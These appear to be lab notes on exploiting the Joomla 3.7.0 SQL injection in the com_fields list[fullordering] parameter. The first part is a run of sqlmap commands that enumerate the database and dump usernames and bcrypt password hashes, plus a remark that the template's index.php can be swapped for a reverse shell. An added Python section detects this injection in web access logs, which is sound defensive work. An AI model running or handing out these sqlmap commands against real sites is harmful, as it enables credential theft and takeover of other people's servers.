Joomla 3.7.0 exploit

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found --tables -p list[fullordering]

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found -T 'table_found' --columns -p list[fullordering]

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found -T 'table_found' -C username --dump -p list[fullordering]

sqlmap -u 'http://10.0.2.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -D joomladb_found -T 'table_found' -C password --dump -p list[fullordering]

The password found is a bcrypt hash.

The template's index.php can now be replaced with a reverse shell.
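On the defending side, the requests produced by the commands above are visible in the web server access log. This is an added detection example, not part of the original notes: it flags com_fields requests whose list[fullordering] value is not a plain sort column. The combined log format, the allowlist pattern, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate ordering is "column" or "column ASC|DESC".
SAFE_ORDERING = re.compile(r"^[A-Za-z0-9_.]+(\s+(asc|desc))?$", re.IGNORECASE)
# MySQL function names that have no business being a sort column.
SQL_FUNCTIONS = {"updatexml", "extractvalue", "sleep", "benchmark"}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_ordering(log_line):
    """Return the offending list[fullordering] value, or None if the line is clean."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    # parse_qs percent-decodes keys and values, so list%5Bfullordering%5D is covered.
    query = parse_qs(urlsplit(match.group(1)).query)
    if query.get("option") != ["com_fields"]:
        return None
    for value in query.get("list[fullordering]", []):
        value = value.strip()
        first_token = value.split()[0].lower() if value else ""
        if not SAFE_ORDERING.match(value) or first_token in SQL_FUNCTIONS:
            return value
    return None


def scan(lines):
    """Return (client_ip, value) for every flagged access-log line."""
    hits = []
    for line in lines:
        value = suspicious_ordering(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


# Constructed sample lines (combined log format); PLACEHOLDER stands in for a payload.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering%20ASC HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(PLACEHOLDER) HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} suspicious list[fullordering]: {value!r}")
```

Because the commands use --random-agent, the check keys on the parameter value rather than on the User-Agent header.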
